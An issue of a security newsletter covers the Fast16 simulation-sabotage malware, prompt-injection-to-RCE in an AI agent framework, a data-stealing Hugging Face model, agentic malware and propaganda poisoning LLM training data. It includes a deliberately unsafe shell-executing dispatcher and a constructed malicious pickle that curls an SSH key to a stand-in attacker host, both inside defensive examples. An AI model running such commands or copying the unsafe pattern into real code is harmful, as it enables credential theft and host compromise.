TechLetters ☕️ Fast16 sabotaged nuclear simulations. LLMs are not security boundaries. Hugging Face model stole data. Malware gets agentic. G7 wants post-quantum crypto. Propaganda trains models.
Security
Fast16: a cyber weapon designed to corrupt the uranium-compression simulations central to Iran’s nuclear weapon design. The targets were LS-DYNA and AUTODYN, two finite element solvers used in everything from car crash tests to explosive detonation modeling. The malware used a kernel-level filesystem filter driver to patch executable code on the fly without touching the files on disk. It only attacked Intel-Fortran-compiled binaries, and only during specific simulation phases: full-scale transient blast runs. The payload required three conditions to act: (1) an explosives-specific equation of state (Jones-Wilkins-Lee, Ignition and Growth, or Lee-Tarver), (2) a variable reaching five times its initial value, and (3) material density crossing 30 g/cm³, the threshold uranium only reaches under implosion-type nuclear weapon compression. Once triggered, it silently degraded stress tensor outputs (pressure, compressibility) to 1-42% of their true values, scaled gradually to avoid obvious artifacts. The message to the engineers: your bomb doesn’t work. Or: your bomb works better than it actually does. Whoever did this understood nuclear weapons physics well enough to know which output values, if subtly wrong, would silently wreck the design process. That is not Google-searchable knowledge. A note for defenders: because the patching happened in the read path and the binaries on disk stayed untouched, a clean hash of the solver taken offline or from a backup says nothing about the code the running process was actually given. https://www.security.com/threat-intelligence/fast16-nuclear-sabotage
“Your LLM is not a security boundary.” Do not architect systems as if it were. Microsoft Semantic Kernel could be exploited to turn prompt injection into host-level remote code execution and pop calc.exe. The model behaved perfectly; the framework just trusted it too much. https://www.microsoft.com/en-us/security/blog/2026/05/07/prompts-become-shells-rce-vulnerabilities-ai-agent-frameworks/
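What “the framework trusted it too much” looks like in code, as an added example that is not from the Microsoft post and not Semantic Kernel’s own code: a toy agent that lets the model choose a tool. The first dispatcher runs whatever the model names, including a free-form shell tool, so a model that has been prompt-injected by a document it summarised gets host RCE. The second treats the model’s output as untrusted input crossing a trust boundary: strict parsing, an allowlist of tools with no shell tool at all, and per-argument validation. The model outputs, the order table and the `lookup_order` tool are constructed for the example (the `calc.exe` of the write-up is replaced by an `echo` so the snippet runs anywhere).

```python
import json
import re
import subprocess
from typing import Callable

# Constructed model outputs standing in for what a prompt-injected model returns.
INJECTED_MODEL_OUTPUT = json.dumps({"tool": "run_shell", "args": {"cmd": "echo INJECTED"}})
BENIGN_MODEL_OUTPUT = json.dumps({"tool": "lookup_order", "args": {"order_id": "A-1001"}})

# Constructed back-end data for the one legitimate tool.
ORDERS = {"A-1001": "shipped", "A-1002": "pending"}


def vulnerable_dispatch(model_output: str) -> str:
    """Trusts the model as a planner: runs whatever tool and arguments it names.
    Exposing a free-form shell tool means a prompt-injected model gets host RCE."""
    call = json.loads(model_output)
    if call["tool"] == "run_shell":
        # Deliberately unsafe: model-controlled text goes straight to a shell.
        proc = subprocess.run(call["args"]["cmd"], shell=True, capture_output=True, text=True)
        return proc.stdout.strip()
    if call["tool"] == "lookup_order":
        return ORDERS.get(call["args"]["order_id"], "unknown")
    return "no such tool"


class ToolPolicyError(Exception):
    """Raised when a model-proposed tool call fails policy; nothing is executed."""


def lookup_order(order_id: str) -> str:
    return ORDERS.get(order_id, "unknown")


# Allowlist: tool name -> (callable, {argument name -> validation regex}).
# There is no shell tool to pick; the model can only choose among these.
TOOL_REGISTRY: dict[str, tuple[Callable[..., str], dict[str, str]]] = {
    "lookup_order": (lookup_order, {"order_id": r"[A-Z]-\d{4}"}),
}


def hardened_dispatch(model_output: str) -> str:
    """Treats model output as untrusted input at a trust boundary: parse strictly,
    allowlist the tool, validate every argument, never hand model text to a shell."""
    try:
        call = json.loads(model_output)
    except json.JSONDecodeError as exc:
        raise ToolPolicyError(f"unparseable tool call: {exc}") from None
    if not isinstance(call, dict) or set(call) != {"tool", "args"}:
        raise ToolPolicyError("tool call must be an object with exactly 'tool' and 'args'")
    entry = TOOL_REGISTRY.get(call["tool"])
    if entry is None:
        raise ToolPolicyError(f"tool not allowlisted: {call['tool']!r}")
    func, schema = entry
    args = call["args"]
    if not isinstance(args, dict) or set(args) != set(schema):
        raise ToolPolicyError(f"arguments must be exactly {sorted(schema)}")
    for name, pattern in schema.items():
        if not isinstance(args[name], str) or not re.fullmatch(pattern, args[name]):
            raise ToolPolicyError(f"argument {name!r} failed validation")
    return func(**args)


if __name__ == "__main__":
    print("vulnerable dispatcher ran:", vulnerable_dispatch(INJECTED_MODEL_OUTPUT))
    try:
        hardened_dispatch(INJECTED_MODEL_OUTPUT)
    except ToolPolicyError as exc:
        print("hardened dispatcher refused:", exc)
    print("hardened dispatcher, benign call:", hardened_dispatch(BENIGN_MODEL_OUTPUT))
```

The point is where the boundary sits: the model may propose, but the code that executes is chosen from a fixed registry and fed only validated arguments, so the worst a hostile document can do is request a lookup. Side-effecting tools (send mail, write files, run code) belong behind explicit policy or human approval, not behind the model’s judgment.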
A malware-infected LLM model was uploaded to Hugging Face (now taken down). It was stealing user data. If you downloaded it recently, do a proper cleanup and incident handling. The model was supposed to help filter private data. Instead it stole private data. The tainted repository: https://huggingface.co/Open-OSS/privacy-filter
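The page does not say how the model exfiltrated data, but one of the common ways a downloaded model runs attacker code is a pickle-based checkpoint (PyTorch `.bin`/`.pkl` files) whose unpickling calls arbitrary Python. The check below, an added example that is not from the Hugging Face repository or any particular scanner, walks a pickle’s opcode stream with `pickletools` without executing it and lists every module and name the file would import, flagging anything outside a small allowlist. Both pickles are constructed inline: a benign weights dict and a payload whose `__reduce__` would have the unpickler spawn `subprocess.Popen`; the allowlist is illustrative.

```python
import io
import pickle
import pickletools
import subprocess

# Illustrative allowlist of top-level modules a tensor checkpoint legitimately
# references (assumption for the example; tune to what your loader really needs).
ALLOWED_TOP_LEVEL = {"torch", "collections", "numpy"}

# Constructed benign payload: a plain dict of weights as a stand-in checkpoint.
BENIGN_PICKLE = pickle.dumps({"layer.weight": [0.1, 0.2], "layer.bias": [0.0]})


class Exfil:
    """Constructed malicious object: unpickling it calls subprocess.Popen with
    attacker-chosen arguments. The command below is never run by this example."""

    def __reduce__(self):
        return (subprocess.Popen, (["curl", "-d", "@/home/user/.ssh/id_rsa", "http://attacker.invalid/"],))


MALICIOUS_PICKLE = pickle.dumps({"layer.weight": [0.1], "hook": Exfil()})

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Statically collect every (module, name) the pickle would import.
    GLOBAL carries both in its argument; STACK_GLOBAL takes them from the two
    most recently pushed strings, which may come back out of the memo."""
    found = []
    recent_strings = []   # strings pushed on the unpickler stack, in order
    memo = {}             # memo slot -> value we tracked for it (None if not a string)
    last = None           # value most recently pushed, if it was a string
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        name = op.name
        if name in STRING_OPS:
            recent_strings.append(arg)
            last = arg
        elif name == "MEMOIZE":
            memo[len(memo)] = last
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):
                recent_strings.append(last)
        elif name == "GLOBAL":
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
            last = None
        elif name == "STACK_GLOBAL":
            attr = recent_strings.pop()
            module = recent_strings.pop()
            found.append((module, attr))
            last = None
        else:
            last = None
    return found


def suspicious_imports(data: bytes) -> list[tuple[str, str]]:
    """Globals whose top-level module is not on the allowlist. Non-empty means:
    do not unpickle this file; treat the download as hostile."""
    return [(m, n) for m, n in referenced_globals(data)
            if m.split(".")[0] not in ALLOWED_TOP_LEVEL]


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PICKLE), ("malicious", MALICIOUS_PICKLE)):
        print(label, "->", suspicious_imports(blob) or "no suspicious imports")
```

Run it over every `.bin`, `.pkl` and `.pt` in a downloaded repository before any `torch.load` or `pickle.load`. Better still, prefer checkpoints in the safetensors format, which has no code path, and pass `weights_only=True` to `torch.load` for the rest; and remember that a model repository can also ship Python files executed via `trust_remote_code=True`, which no pickle scan will catch.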
Integrating LLMs into malware operations lets payloads act autonomously: independently interacting with the victim environment or device, synthesizing system state, and executing precise commands without human supervision. https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access?e=48754805
The G7 calls for a transition to post-quantum cryptography. https://assets.publishing.service.gov.uk/media/6966149d8d599f4c09e1ffab/G7-CEG-Quantum-Roadmap.pdf
Privacy
Technology Policy
Other
Propaganda enters the internet as text, then exits the model as an “answer”. States do not need to control an AI model directly to shape its answers. They only need to control enough of the text the model learns from. This Nature paper shows that Chinese state-coordinated media entered LLM training data easily. Models memorized parts of such input material at rates between 3% and 10%. When a model was further trained on just 6,400 examples of Chinese state-scripted media, almost 80% of its answers became more favorable to the Chinese government than the base model’s. When China-related questions were asked in Chinese, human reviewers judged the Chinese-language answers more favorable to China 75.3% of the time. The lower a country’s media freedom, the more likely a model is to answer more favorably toward the regime in the local language than in English. The most effective prompt injection starts years before the prompt. This is not a model bug. It is a feature of the world that was loaded into it. https://www.nature.com/articles/s41586-026-10506-7